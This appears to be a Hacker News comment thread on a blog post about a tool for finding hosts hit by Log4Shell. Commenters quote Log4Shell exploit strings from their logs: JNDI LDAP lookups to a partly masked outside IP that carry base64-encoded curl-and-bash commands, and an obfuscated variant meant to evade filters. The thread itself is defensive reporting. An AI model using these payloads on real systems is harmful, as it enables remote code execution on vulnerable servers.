Settings

Theme

Our new tool for enumerating hidden Log4Shell-affected hosts

blog.silentsignal.eu

22 points by dnet 4 years ago · 3 comments

Reader

elric 4 years ago

We've been noticing attempted exploits in the wild. Attempts like these have started appearing in our logs:

> /?x=${jndi:ldap://45.155.205.XXX:12344/Basic/Command/Base64/<base64 encoded call to curl & bash>

Patch your tools, folks. If you can't do that, modify your ingress services and have them filter out stuff like this.

  • bArray 4 years ago

    Can confirm this also:

        ${jndi:ldap://45.155.205.xxx:12 344/Basic/Command/Base64/<base64>}
    
    > Patch your tools, folks. If you can't do that, modify your ingress services and have them filter out stuff like this.

    Note that the filtering may not work, I am already seeing some variations of mitigation by the attackers:

        ${${::-j}${::-n}${::-d}${::-i}:${::-l}${::-d}${::-a}${::-p}://45.155.205.xxx:12344/Basic/Command/Base64/<base64>

Keyboard Shortcuts

j
Next item
k
Previous item
o / Enter
Open selected item
?
Show this help
Esc
Close modal / clear selection